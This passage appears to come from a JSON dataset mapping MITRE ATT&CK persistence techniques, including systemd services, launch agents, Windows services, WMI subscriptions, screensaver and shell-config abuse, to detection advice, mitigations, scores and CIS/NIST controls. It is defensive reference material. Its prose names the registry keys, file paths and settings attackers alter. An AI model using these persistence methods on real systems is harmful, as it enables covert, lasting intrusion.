Netbooting is one option in the boot sequence and can be used to centralize, manage, and control device images.\n\nAdversaries may manipulate the configuration on the network device specifying use of a malicious TFTP server, which may be used in conjunction with [Modify System Image](https://attack.mitre.org/techniques/T1601) to load a modified image on device startup or reset. The unauthorized image allows adversaries to modify device configuration, add malicious capabilities to the device, and introduce backdoors to maintain control of the network device while minimizing detection through use of a standard functionality. This technique is similar to [ROMMONkit](https://attack.mitre.org/techniques/T1542/004) and may result in the network device running a modified image. (Citation: Cisco Blog Legacy Device Attacks)", + "detection": "Consider comparing a copy of the network device configuration and system image against a known-good version to discover unauthorized changes to system boot, startup configuration, or the running OS. (Citation: Cisco IOS Software Integrity Assurance - Secure Boot) (Citation: Cisco IOS Software Integrity Assurance - Image File Verification)The same process can be accomplished through a comparison of the run-time memory, though this is non-trivial and may require assistance from the vendor. (Citation: Cisco IOS Software Integrity Assurance - Run-Time Memory Verification)\n\nReview command history in either the console or as part of the running memory to determine if unauthorized or suspicious commands were used to modify device configuration. (Citation: Cisco IOS Software Integrity Assurance - Command History) Check boot information including system uptime, image booted, and startup configuration to determine if results are consistent with expected behavior in the environment. (Citation: Cisco IOS Software Integrity Assurance - Boot Information) Monitor unusual connections or connection attempts to the device that may specifically target TFTP or other file-sharing protocols.", + "mitigations": [ + { + "mid": "M1047", + "name": "Audit", + "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.", + "url": "https://attack.mitre.org/mitigations/M1047" + }, + { + "mid": "M1046", + "name": "Boot Integrity", + "description": "Use secure methods to boot a system and verify the integrity of the operating system and loading mechanisms.", + "url": "https://attack.mitre.org/mitigations/M1046" + }, + { + "mid": "M1035", + "name": "Limit Access to Resource Over Network", + "description": "Prevent access to file shares, remote access to systems, unnecessary services. Mechanisms to limit access may include use of network concentrators, RDP gateways, etc.", + "url": "https://attack.mitre.org/mitigations/M1035" + }, + { + "mid": "M1031", + "name": "Network Intrusion Prevention", + "description": "Use intrusion detection signatures to block traffic at network boundaries.", + "url": "https://attack.mitre.org/mitigations/M1031" + }, + { + "mid": "M1028", + "name": "Operating System Configuration", + "description": "Make configuration changes related to the operating system or a common feature of the operating system that result in system hardening against techniques.", + "url": "https://attack.mitre.org/mitigations/M1028" + }, + { + "mid": "M1026", + "name": "Privileged Account Management", + "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.", + "url": "https://attack.mitre.org/mitigations/M1026" + } + ] + } + ], + "mitigations": [ + { + "mid": "M1046", + "name": "Boot Integrity", + "description": "Use secure methods to boot a system and verify the integrity of the operating system and loading mechanisms.", + "url": "https://attack.mitre.org/mitigations/M1046" + }, + { + "mid": "M1026", + "name": "Privileged Account Management", + "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.", + "url": "https://attack.mitre.org/mitigations/M1026" + }, + { + "mid": "M1051", + "name": "Update Software", + "description": "Perform regular software updates to mitigate exploitation risk.", + "url": "https://attack.mitre.org/mitigations/M1051" + } + ], + "cumulative_score": 0.6690408993019048, + "adjusted_score": 0.6690408993019048, + "has_car": false, + "has_sigma": false, + "has_es_siem": false, + "has_splunk": true, + "cis_controls": [ + "3.6,4.1,4.7,5.3,5.4,6.1,6.2,6.8,7.1,7.2,7.3,7.5,18.3,18.5" + ], + "nist_controls": [ + "AC-2", + "AC-3", + "AC-5", + "AC-6", + "CA-8", + "CM-3", + "CM-5", + "CM-6", + "CM-8", + "IA-2", + "IA-7", + "IA-8", + "RA-9", + "SA-10", + "SA-11", + "SC-34", + "SC-7", + "SI-2", + "SI-7" + ], + "process_coverage": true, + "network_coverage": true, + "file_coverage": false, + "cloud_coverage": false, + "hardware_coverage": true + }, + { + "tid": "T1543", + "name": "Create or Modify System Process", + "description": "Adversaries may create or modify system-level processes to repeatedly execute malicious payloads as part of persistence. When operating systems boot up, they can start processes that perform background system functions. On Windows and Linux, these system processes are referred to as services. (Citation: TechNet Services) On macOS, launchd processes known as [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) and [Launch Agent](https://attack.mitre.org/techniques/T1543/001) are run to finish system initialization and load user specific parameters.(Citation: AppleDocs Launch Agent Daemons) \n\nAdversaries may install new services, daemons, or agents that can be configured to execute at startup or a repeatable interval in order to establish persistence. Similarly, adversaries may modify existing services, daemons, or agents to achieve the same effect. \n\nServices, daemons, or agents may be created with administrator privileges but executed under root/SYSTEM privileges. Adversaries may leverage this functionality to create or modify system processes in order to escalate privileges. (Citation: OSX Malware Detection). ", + "url": "https://attack.mitre.org/techniques/T1543", + "tactics": [ + "Persistence", + "Privilege Escalation" + ], + "detection": "Monitor for changes to system processes that do not correlate with known software, patch cycles, etc., including by comparing results against a trusted system baseline. New, benign system processes may be created during installation of new software. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement. \n\nCommand-line invocation of tools capable of modifying services may be unusual, depending on how systems are typically used in a particular environment. Look for abnormal process call trees from known services and for execution of other commands that could relate to Discovery or other adversary techniques. \n\nMonitor for changes to files associated with system-level processes.", + "platforms": [ + "Linux", + "Windows", + "macOS" + ], + "data_sources": [ + "Command: Command Execution", + "File: File Creation", + "File: File Modification", + "Process: OS API Execution", + "Process: Process Creation", + "Service: Service Creation", + "Service: Service Modification", + "Windows Registry: Windows Registry Key Creation", + "Windows Registry: Windows Registry Key Modification" + ], + "is_subtechnique": false, + "supertechnique": null, + "subtechniques": [ + { + "tid": "T1543.001", + "name": "Create or Modify System Process: Launch Agent", + "url": "https://attack.mitre.org/techniques/T1543/001", + "description": "Adversaries may create or modify launch agents to repeatedly execute malicious payloads as part of persistence. When a user logs in, a per-user launchd process is started which loads the parameters for each launch-on-demand user agent from the property list (.plist) file found in /System/Library/LaunchAgents, /Library/LaunchAgents, and ~/Library/LaunchAgents.(Citation: AppleDocs Launch Agent Daemons)(Citation: OSX Keydnap malware) (Citation: Antiquated Mac Malware) Property list files use the Label, ProgramArguments , and RunAtLoad keys to identify the Launch Agent's name, executable location, and execution time.(Citation: OSX.Dok Malware) Launch Agents are often installed to perform updates to programs, launch user specified programs at login, or to conduct other developer tasks.\n\n Launch Agents can also be executed using the [Launchctl](https://attack.mitre.org/techniques/T1569/001) command.\n \nAdversaries may install a new Launch Agent that executes at login by placing a .plist file into the appropriate folders with the RunAtLoad or KeepAlive keys set to true.(Citation: Sofacy Komplex Trojan)(Citation: Methods of Mac Malware Persistence) The Launch Agent name may be disguised by using a name from the related operating system or benign software. Launch Agents are created with user level privileges and execute with user level permissions.(Citation: OSX Malware Detection)(Citation: OceanLotus for OS X) ", + "detection": "Monitor Launch Agent creation through additional plist files and utilities such as Objective-See’s KnockKnock application. Launch Agents also require files on disk for persistence which can also be monitored via other file monitoring applications.\n\nEnsure Launch Agent's ProgramArguments key pointing to executables located in the /tmp or /shared folders are in alignment with enterprise policy. Ensure all Launch Agents with the RunAtLoad key set to true are in alignment with policy. ", + "mitigations": [] + }, + { + "tid": "T1543.002", + "name": "Create or Modify System Process: Systemd Service", + "url": "https://attack.mitre.org/techniques/T1543/002", + "description": "Adversaries may create or modify systemd services to repeatedly execute malicious payloads as part of persistence. The systemd service manager is commonly used for managing background daemon processes (also known as services) and other system resources.(Citation: Linux man-pages: systemd January 2014)(Citation: Freedesktop.org Linux systemd 29SEP2018) Systemd is the default initialization (init) system on many Linux distributions starting with Debian 8, Ubuntu 15.04, CentOS 7, RHEL 7, Fedora 15, and replaces legacy init systems including SysVinit and Upstart while remaining backwards compatible with the aforementioned init systems.\n\nSystemd utilizes configuration files known as service units to control how services boot and under what conditions. By default, these unit files are stored in the /etc/systemd/system and /usr/lib/systemd/system directories and have the file extension .service. Each service unit file may contain numerous directives that can execute system commands:\n\n* ExecStart, ExecStartPre, and ExecStartPost directives cover execution of commands when a services is started manually by 'systemctl' or on system start if the service is set to automatically start. \n* ExecReload directive covers when a service restarts. \n* ExecStop and ExecStopPost directives cover when a service is stopped or manually by 'systemctl'.\n\nAdversaries have used systemd functionality to establish persistent access to victim systems by creating and/or modifying service unit files that cause systemd to execute malicious commands at system boot.(Citation: Anomali Rocke March 2019)\n\nWhile adversaries typically require root privileges to create/modify service unit files in the /etc/systemd/system and /usr/lib/systemd/system directories, low privilege users can create/modify service unit files in directories such as ~/.config/systemd/user/ to achieve user-level persistence.(Citation: Rapid7 Service Persistence 22JUNE2016)", + "detection": "Adversaries may create or modify systemd services to repeatedly execute malicious payloads as part of persistence. The systemd service manager is commonly used for managing background daemon processes (also known as services) and other system resources.(Citation: Linux man-pages: systemd January 2014)(Citation: Freedesktop.org Linux systemd 29SEP2018) Systemd is the default initialization (init) system on many Linux distributions starting with Debian 8, Ubuntu 15.04, CentOS 7, RHEL 7, Fedora 15, and replaces legacy init systems including SysVinit and Upstart while remaining backwards compatible with the aforementioned init systems.\n\nSystemd utilizes configuration files known as service units to control how services boot and under what conditions. By default, these unit files are stored in the /etc/systemd/system and /usr/lib/systemd/system directories and have the file extension .service. Each service unit file may contain numerous directives that can execute system commands:\n\n* ExecStart, ExecStartPre, and ExecStartPost directives cover execution of commands when a services is started manually by 'systemctl' or on system start if the service is set to automatically start. \n* ExecReload directive covers when a service restarts. \n* ExecStop and ExecStopPost directives cover when a service is stopped or manually by 'systemctl'.\n\nAdversaries have used systemd functionality to establish persistent access to victim systems by creating and/or modifying service unit files that cause systemd to execute malicious commands at system boot.(Citation: Anomali Rocke March 2019)\n\nWhile adversaries typically require root privileges to create/modify service unit files in the /etc/systemd/system and /usr/lib/systemd/system directories, low privilege users can create/modify service unit files in directories such as ~/.config/systemd/user/ to achieve user-level persistence.(Citation: Rapid7 Service Persistence 22JUNE2016)", + "mitigations": [ + { + "mid": "M1033", + "name": "Limit Software Installation", + "description": "Block users or groups from installing unapproved software.", + "url": "https://attack.mitre.org/mitigations/M1033" + }, + { + "mid": "M1026", + "name": "Privileged Account Management", + "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.", + "url": "https://attack.mitre.org/mitigations/M1026" + }, + { + "mid": "M1022", + "name": "Restrict File and Directory Permissions", + "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.", + "url": "https://attack.mitre.org/mitigations/M1022" + }, + { + "mid": "M1018", + "name": "User Account Management", + "description": "Manage the creation, modification, use, and permissions associated to user accounts.", + "url": "https://attack.mitre.org/mitigations/M1018" + } + ] + }, + { + "tid": "T1543.003", + "name": "Create or Modify System Process: Windows Service", + "url": "https://attack.mitre.org/techniques/T1543/003", + "description": "Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.(Citation: TechNet Services) Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry. Service configurations can be modified using utilities such as sc.exe and [Reg](https://attack.mitre.org/software/S0075). \n\nAdversaries may install a new service or modify an existing service by using system utilities to interact with services, by directly modifying the Registry, or by using custom tools to interact with the Windows API. Adversaries may configure services to execute at startup in order to persist on a system.\n\nAn adversary may also incorporate [Masquerading](https://attack.mitre.org/techniques/T1036) by using a service name from a related operating system or benign software, or by modifying existing services to make detection analysis more challenging. Modifying existing services may interrupt their functionality or may enable services that are disabled or otherwise not commonly used. \n\nServices may be created with administrator privileges but are executed under SYSTEM privileges, so an adversary may also use a service to escalate privileges from administrator to SYSTEM. Adversaries may also directly start services through [Service Execution](https://attack.mitre.org/techniques/T1569/002). ", + "detection": "Monitor processes and command-line arguments for actions that could create or modify services. Command-line invocation of tools capable of adding or modifying services may be unusual, depending on how systems are typically used in a particular environment. Services may also be modified through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001), so additional logging may need to be configured to gather the appropriate data. Remote access tools with built-in features may also interact directly with the Windows API to perform these functions outside of typical system utilities. Collect service utility execution and service binary path arguments used for analysis. Service binary paths may even be changed to execute commands or scripts. \n\nLook for changes to service Registry entries that do not correlate with known software, patch cycles, etc. Service information is stored in the Registry at HKLM\\SYSTEM\\CurrentControlSet\\Services. Changes to the binary path and the service startup type changed from manual or disabled to automatic, if it does not typically do so, may be suspicious. Tools such as Sysinternals Autoruns may also be used to detect system service changes that could be attempts at persistence.(Citation: TechNet Autoruns) \n\nCreation of new services may generate an alterable event (ex: Event ID 4697 and/or 7045 (Citation: Microsoft 4697 APR 2017)(Citation: Microsoft Windows Event Forwarding FEB 2018)). New, benign services may be created during installation of new software.\n\nSuspicious program execution through services may show up as outlier processes that have not been seen before when compared against historical data. Look for abnormal process call trees from known services and for execution of other commands that could relate to Discovery or other adversary techniques. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.", + "mitigations": [ + { + "mid": "M1047", + "name": "Audit", + "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.", + "url": "https://attack.mitre.org/mitigations/M1047" + }, + { + "mid": "M1018", + "name": "User Account Management", + "description": "Manage the creation, modification, use, and permissions associated to user accounts.", + "url": "https://attack.mitre.org/mitigations/M1018" + } + ] + }, + { + "tid": "T1543.004", + "name": "Create or Modify System Process: Launch Daemon", + "url": "https://attack.mitre.org/techniques/T1543/004", + "description": "Adversaries may create or modify Launch Daemons to execute malicious payloads as part of persistence. Launch Daemons are plist files used to interact with Launchd, the service management framework used by macOS. Launch Daemons require elevated privileges to install, are executed for every user on a system prior to login, and run in the background without the need for user interaction. During the macOS initialization startup, the launchd process loads the parameters for launch-on-demand system-level daemons from plist files found in /System/Library/LaunchDaemons/ and /Library/LaunchDaemons/. Required Launch Daemons parameters include a Label to identify the task, Program to provide a path to the executable, and RunAtLoad to specify when the task is run. Launch Daemons are often used to provide access to shared resources, updates to software, or conduct automation tasks.(Citation: AppleDocs Launch Agent Daemons)(Citation: Methods of Mac Malware Persistence)(Citation: launchd Keywords for plists)\n\nAdversaries may install a Launch Daemon configured to execute at startup by using the RunAtLoad parameter set to true and the Program parameter set to the malicious executable path. The daemon name may be disguised by using a name from a related operating system or benign software (i.e. [Masquerading](https://attack.mitre.org/techniques/T1036)). When the Launch Daemon is executed, the program inherits administrative permissions.(Citation: WireLurker)(Citation: OSX Malware Detection)\n\nAdditionally, system configuration changes (such as the installation of third party package managing software) may cause folders such as usr/local/bin to become globally writeable. So, it is possible for poor configurations to allow an adversary to modify executables referenced by current Launch Daemon's plist files.(Citation: LaunchDaemon Hijacking)(Citation: sentinelone macos persist Jun 2019)", + "detection": "Monitor for new files added to the /Library/LaunchDaemons/ folder. The System LaunchDaemons are protected by SIP.\n\nSome legitimate LaunchDaemons point to unsigned code that could be exploited. For Launch Daemons with the RunAtLoad parameter set to true, ensure the Program parameter points to signed code or executables are in alignment with enterprise policy. Some parameters are interchangeable with others, such as Program and ProgramArguments parameters but one must be present.(Citation: launchd Keywords for plists)\n\n", + "mitigations": [ + { + "mid": "M1047", + "name": "Audit", + "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.", + "url": "https://attack.mitre.org/mitigations/M1047" + }, + { + "mid": "M1018", + "name": "User Account Management", + "description": "Manage the creation, modification, use, and permissions associated to user accounts.", + "url": "https://attack.mitre.org/mitigations/M1018" + } + ] + } + ], + "mitigations": [ + { + "mid": "M1047", + "name": "Audit", + "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.", + "url": "https://attack.mitre.org/mitigations/M1047" + }, + { + "mid": "M1033", + "name": "Limit Software Installation", + "description": "Block users or groups from installing unapproved software.", + "url": "https://attack.mitre.org/mitigations/M1033" + }, + { + "mid": "M1022", + "name": "Restrict File and Directory Permissions", + "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.", + "url": "https://attack.mitre.org/mitigations/M1022" + }, + { + "mid": "M1018", + "name": "User Account Management", + "description": "Manage the creation, modification, use, and permissions associated to user accounts.", + "url": "https://attack.mitre.org/mitigations/M1018" + } + ], + "cumulative_score": 2.816066666666667, + "adjusted_score": 2.816066666666667, + "has_car": false, + "has_sigma": true, + "has_es_siem": true, + "has_splunk": true, + "cis_controls": [ + "2.3,2.5,3.3,4.1,4.7,5.3,5.4,6.1,6.2,6.8,18.3,18.5" + ], + "nist_controls": [ + "AC-17", + "AC-2", + "AC-3", + "AC-5", + "AC-6", + "CA-7", + "CA-8", + "CM-11", + "CM-2", + "CM-3", + "CM-5", + "CM-6", + "CM-7", + "IA-2", + "IA-4", + "RA-5", + "SA-22", + "SI-16", + "SI-3", + "SI-4", + "SI-7" + ], + "process_coverage": true, + "network_coverage": false, + "file_coverage": true, + "cloud_coverage": false, + "hardware_coverage": true + }, + { + "tid": "T1546", + "name": "Event Triggered Execution", + "description": "Adversaries may establish persistence and/or elevate privileges using system mechanisms that trigger execution based on specific events. Various operating systems have means to monitor and subscribe to events such as logons or other user activity such as running specific applications/binaries. \n\nAdversaries may abuse these mechanisms as a means of maintaining persistent access to a victim via repeatedly executing malicious code. After gaining access to a victim system, adversaries may create/modify event triggers to point to malicious content that will be executed whenever the event trigger is invoked.(Citation: FireEye WMI 2015)(Citation: Malware Persistence on OS X)(Citation: amnesia malware)\n\nSince the execution can be proxied by an account with higher permissions, such as SYSTEM or service accounts, an adversary may be able to abuse these triggered execution mechanisms to escalate their privileges. ", + "url": "https://attack.mitre.org/techniques/T1546", + "tactics": [ + "Persistence", + "Privilege Escalation" + ], + "detection": "Monitoring for additions or modifications of mechanisms that could be used to trigger event-based execution, especially the addition of abnormal commands such as execution of unknown programs, opening network sockets, or reaching out across the network. Also look for changes that do not line up with updates, patches, or other planned administrative activity. \n\nThese mechanisms may vary by OS, but are typically stored in central repositories that store configuration information such as the Windows Registry, Common Information Model (CIM), and/or specific named files, the last of which can be hashed and compared to known good values. \n\nMonitor for processes, API/System calls, and other common ways of manipulating these event repositories. \n\nTools such as Sysinternals Autoruns can be used to detect changes to execution triggers that could be attempts at persistence. Also look for abnormal process call trees for execution of other commands that could relate to Discovery actions or other techniques. \n\nMonitor DLL loads by processes, specifically looking for DLLs that are not recognized or not normally loaded into a process. Look for abnormal process behavior that may be due to a process loading a malicious DLL. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as making network connections for Command and Control, learning details about the environment through Discovery, and conducting Lateral Movement. ", + "platforms": [ + "Linux", + "Windows", + "macOS" + ], + "data_sources": [ + "Command: Command Execution", + "File: File Creation", + "File: File Metadata", + "File: File Modification", + "Module: Module Load", + "Process: Process Creation", + "WMI: WMI Creation", + "Windows Registry: Windows Registry Key Modification" + ], + "is_subtechnique": false, + "supertechnique": null, + "subtechniques": [ + { + "tid": "T1546.001", + "name": "Event Triggered Execution: Change Default File Association", + "url": "https://attack.mitre.org/techniques/T1546/001", + "description": "Adversaries may establish persistence by executing malicious content triggered by a file type association. When a file is opened, the default program used to open the file (also called the file association or handler) is checked. File association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access (Citation: Microsoft Change Default Programs) (Citation: Microsoft File Handlers) or by administrators using the built-in assoc utility. (Citation: Microsoft Assoc Oct 2017) Applications can modify the file association for a given file extension to call an arbitrary program when a file with the given extension is opened.\n\nSystem file associations are listed under HKEY_CLASSES_ROOT\\.[extension], for example HKEY_CLASSES_ROOT\\.txt. The entries point to a handler for that extension located at HKEY_CLASSES_ROOT\\[handler]. The various commands are then listed as subkeys underneath the shell key at HKEY_CLASSES_ROOT\\[handler]\\shell\\[action]\\command. For example: \n* HKEY_CLASSES_ROOT\\txtfile\\shell\\open\\command\n* HKEY_CLASSES_ROOT\\txtfile\\shell\\print\\command\n* HKEY_CLASSES_ROOT\\txtfile\\shell\\printto\\command\n\nThe values of the keys listed are commands that are executed when the handler opens the file extension. Adversaries can modify these values to continually execute arbitrary commands. (Citation: TrendMicro TROJ-FAKEAV OCT 2012)", + "detection": "Collect and analyze changes to Registry keys that associate file extensions to default applications for execution and correlate with unknown process launch activity or unusual file types for that process.\n\nUser file association preferences are stored under [HKEY_CURRENT_USER]\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts and override associations configured under [HKEY_CLASSES_ROOT]. Changes to a user's preference will occur under this entry's subkeys.\n\nAlso look for abnormal process call trees for execution of other commands that could relate to Discovery actions or other techniques.", + "mitigations": [] + }, + { + "tid": "T1546.002", + "name": "Event Triggered Execution: Screensaver", + "url": "https://attack.mitre.org/techniques/T1546/002", + "description": "Adversaries may establish persistence by executing malicious content triggered by user inactivity. Screensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension.(Citation: Wikipedia Screensaver) The Windows screensaver application scrnsave.scr is located in C:\\Windows\\System32\\, and C:\\Windows\\sysWOW64\\ on 64-bit Windows systems, along with screensavers included with base Windows installations.\n\nThe following screensaver settings are stored in the Registry (HKCU\\Control Panel\\Desktop\\) and could be manipulated to achieve persistence:\n\n* SCRNSAVE.exe - set to malicious PE path\n* ScreenSaveActive - set to '1' to enable the screensaver\n* ScreenSaverIsSecure - set to '0' to not require a password to unlock\n* ScreenSaveTimeout - sets user inactivity timeout before screensaver is executed\n\nAdversaries can use screensaver settings to maintain persistence by setting the screensaver to run malware after a certain timeframe of user inactivity. (Citation: ESET Gazer Aug 2017)", + "detection": "Monitor process execution and command-line parameters of .scr files. Monitor changes to screensaver configuration changes in the Registry that may not correlate with typical user behavior.\n\nTools such as Sysinternals Autoruns can be used to detect changes to the screensaver binary path in the Registry. Suspicious paths and PE files may indicate outliers among legitimate screensavers in a network and should be investigated.", + "mitigations": [ + { + "mid": "M1042", + "name": "Disable or Remove Feature or Program", + "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.", + "url": "https://attack.mitre.org/mitigations/M1042" + }, + { + "mid": "M1038", + "name": "Execution Prevention", + "description": "Block execution of code on a system through application control, and/or script blocking.", + "url": "https://attack.mitre.org/mitigations/M1038" + } + ] + }, + { + "tid": "T1546.003", + "name": "Event Triggered Execution: Windows Management Instrumentation Event Subscription", + "url": "https://attack.mitre.org/techniques/T1546/003", + "description": "Adversaries may establish persistence and elevate privileges by executing malicious content triggered by a Windows Management Instrumentation (WMI) event subscription. WMI can be used to install event filters, providers, consumers, and bindings that execute code when a defined event occurs. Examples of events that may be subscribed to are the wall clock time, user loging, or the computer's uptime. (Citation: Mandiant M-Trends 2015)\n\nAdversaries may use the capabilities of WMI to subscribe to an event and execute arbitrary code when that event occurs, providing persistence on a system. (Citation: FireEye WMI SANS 2015) (Citation: FireEye WMI 2015) Adversaries may also compile WMI scripts into Windows Management Object (MOF) files (.mof extension) that can be used to create a malicious subscription. (Citation: Dell WMI Persistence) (Citation: Microsoft MOF May 2018)\n\nWMI subscription execution is proxied by the WMI Provider Host process (WmiPrvSe.exe) and thus may result in elevated SYSTEM privileges.", + "detection": "Monitor WMI event subscription entries, comparing current WMI event subscriptions to known good subscriptions for each host. Tools such as Sysinternals Autoruns may also be used to detect WMI changes that could be attempts at persistence. (Citation: TechNet Autoruns) (Citation: Medium Detecting WMI Persistence) Monitor for the creation of new WMI EventFilter, EventConsumer, and FilterToConsumerBinding events. Event ID 5861 is logged on Windows 10 systems when new EventFilterToConsumerBinding events are created.(Citation: Elastic - Hunting for Persistence Part 1)\n\nMonitor processes and command-line arguments that can be used to register WMI persistence, such as the Register-WmiEvent [PowerShell](https://attack.mitre.org/techniques/T1059/001) cmdlet (Citation: Microsoft Register-WmiEvent), as well as those that result from the execution of subscriptions (i.e. spawning from the WmiPrvSe.exe WMI Provider Host process).", + "mitigations": [ + { + "mid": "M1040", + "name": "Behavior Prevention on Endpoint", + "description": "Use capabilities to prevent suspicious behavior patterns from occurring on endpoint systems. This could include suspicious process, file, API call, etc. behavior.", + "url": "https://attack.mitre.org/mitigations/M1040" + }, + { + "mid": "M1026", + "name": "Privileged Account Management", + "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.", + "url": "https://attack.mitre.org/mitigations/M1026" + }, + { + "mid": "M1018", + "name": "User Account Management", + "description": "Manage the creation, modification, use, and permissions associated to user accounts.", + "url": "https://attack.mitre.org/mitigations/M1018" + } + ] + }, + { + "tid": "T1546.004", + "name": "Event Triggered Execution: Unix Shell Configuration Modification", + "url": "https://attack.mitre.org/techniques/T1546/004", + "description": "Adversaries may establish persistence through executing malicious commands triggered by a user’s shell. User [Unix Shell](https://attack.mitre.org/techniques/T1059/004)s execute several configuration scripts at different points throughout the session based on events. For example, when a user opens a command-line interface or remotely logs in (such as via SSH) a login shell is initiated. The login shell executes scripts from the system (/etc) and the user’s home directory (~/) to configure the environment. All login shells on a system use /etc/profile when initiated. These configuration scripts run at the permission level of their directory and are often used to set environment variables, create aliases, and customize the user’s environment. When the shell exits or terminates, additional shell scripts are executed to ensure the shell exits appropriately. \n\nAdversaries may attempt to establish persistence by inserting commands into scripts automatically executed by shells. Using bash as an example, the default shell for most GNU/Linux systems, adversaries may add commands that launch malicious binaries into the /etc/profile and /etc/profile.d files.(Citation: intezer-kaiji-malware)(Citation: bencane blog bashrc) These files typically require root permissions to modify and are executed each time any shell on a system launches. For user level permissions, adversaries can insert malicious commands into ~/.bash_profile, ~/.bash_login, or ~/.profile which are sourced when a user opens a command-line interface or connects remotely.(Citation: anomali-rocke-tactics)(Citation: Linux manual bash invocation) Since the system only executes the first existing file in the listed order, adversaries have used ~/.bash_profile to ensure execution. Adversaries have also leveraged the ~/.bashrc file which is additionally executed if the connection is established remotely or an additional interactive shell is opened, such as a new tab in the command-line interface.(Citation: Tsunami)(Citation: anomali-rocke-tactics)(Citation: anomali-linux-rabbit)(Citation: Magento) Some malware targets the termination of a program to trigger execution, adversaries can use the ~/.bash_logout file to execute malicious commands at the end of a session. \n\nFor macOS, the functionality of this technique is similar but may leverage zsh, the default shell for macOS 10.15+. When the Terminal.app is opened, the application launches a zsh login shell and a zsh interactive shell. The login shell configures the system environment using /etc/profile, /etc/zshenv, /etc/zprofile, and /etc/zlogin.(Citation: ScriptingOSX zsh)(Citation: PersistentJXA_leopitt)(Citation: code_persistence_zsh)(Citation: macOS MS office sandbox escape) The login shell then configures the user environment with ~/.zprofile and ~/.zlogin. The interactive shell uses the ~/.zshrc to configure the user environment. Upon exiting, /etc/zlogout and ~/.zlogout are executed. For legacy programs, macOS executes /etc/bashrc on startup.", + "detection": "While users may customize their shell profile files, there are only certain types of commands that typically appear in these files. Monitor for abnormal commands such as execution of unknown programs, opening network sockets, or reaching out across the network when user profiles are loaded during the login process.\n\nMonitor for changes to /etc/profile and /etc/profile.d, these files should only be modified by system administrators. MacOS users can leverage Endpoint Security Framework file events monitoring these specific files.(Citation: ESF_filemonitor) \n\nFor most Linux and macOS systems, a list of file paths for valid shell options available on a system are located in the /etc/shells file.\n", + "mitigations": [ + { + "mid": "M1022", + "name": "Restrict File and Directory Permissions", + "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.", + "url": "https://attack.mitre.org/mitigations/M1022" + } + ] + }, + { + "tid": "T1546.005", + "name": "Event Triggered Execution: Trap", + "url": "https://attack.mitre.org/techniques/T1546/005", + "description": "Adversaries may establish persistence by executing malicious content triggered by an interrupt signal. The trap command allows programs and shells to specify commands that will be executed upon receiving interrupt signals. A common situation is a script allowing for graceful termination and handling of common keyboard interrupts like ctrl+c and ctrl+d.\n\nAdversaries can use this to register code to be executed when the shell encounters specific interrupts as a persistence mechanism. Trap commands are of the following format trap 'command list' signals where \"command list\" will be executed when \"signals\" are received.(Citation: Trap Manual)(Citation: Cyberciti Trap Statements)", + "detection": "Trap commands must be registered for the shell or programs, so they appear in files. Monitoring files for suspicious or overly broad trap commands can narrow down suspicious behavior during an investigation. Monitor for suspicious processes executed through trap interrupts.", + "mitigations": [] + }, + { + "tid": "T1546.006", + "name": "Event Triggered Execution: LC_LOAD_DYLIB Addition", + "url": "https://attack.mitre.org/techniques/T1546/006", + "description": "Adversaries may establish persistence by executing malicious content triggered by the execution of tainted binaries. Mach-O binaries have a series of headers that are used to perform certain operations when a binary is loaded. The LC_LOAD_DYLIB header in a Mach-O binary tells macOS and OS X which dynamic libraries (dylibs) to load during execution time. These can be added ad-hoc to the compiled binary as long as adjustments are made to the rest of the fields and dependencies. (Citation: Writing Bad Malware for OSX) There are tools available to perform these changes.\n\nAdversaries may modify Mach-O binary headers to load and execute malicious dylibs every time the binary is executed. Although any changes will invalidate digital signatures on binaries because the binary is being modified, this can be remediated by simply removing the LC_CODE_SIGNATURE command from the binary so that the signature isn’t checked at load time. (Citation: Malware Persistence on OS X)", + "detection": "Monitor processes for those that may be used to modify binary headers. Monitor file systems for changes to application binaries and invalid checksums/signatures. Changes to binaries that do not line up with application updates or patches are also extremely suspicious.", + "mitigations": [ + { + "mid": "M1047", + "name": "Audit", + "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.", + "url": "https://attack.mitre.org/mitigations/M1047" + }, + { + "mid": "M1045", + "name": "Code Signing", + "description": "Enforce binary and application integrity with digital signature verification to prevent untrusted code from executing.", + "url": "https://attack.mitre.org/mitigations/M1045" + }, + { + "mid": "M1038", + "name": "Execution Prevention", + "description": "Block execution of code on a system through application control, and/or script blocking.", + "url": "https://attack.mitre.org/mitigations/M1038" + } + ] + }, + { + "tid": "T1546.007", + "name": "Event Triggered Execution: Netsh Helper DLL", + "url": "https://attack.mitre.org/techniques/T1546/007", + "description": "Adversaries may establish persistence by executing malicious content triggered by Netsh Helper DLLs. Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system. It contains functionality to add helper DLLs for extending functionality of the utility. (Citation: TechNet Netsh) The paths to registered netsh.exe helper DLLs are entered into the Windows Registry at 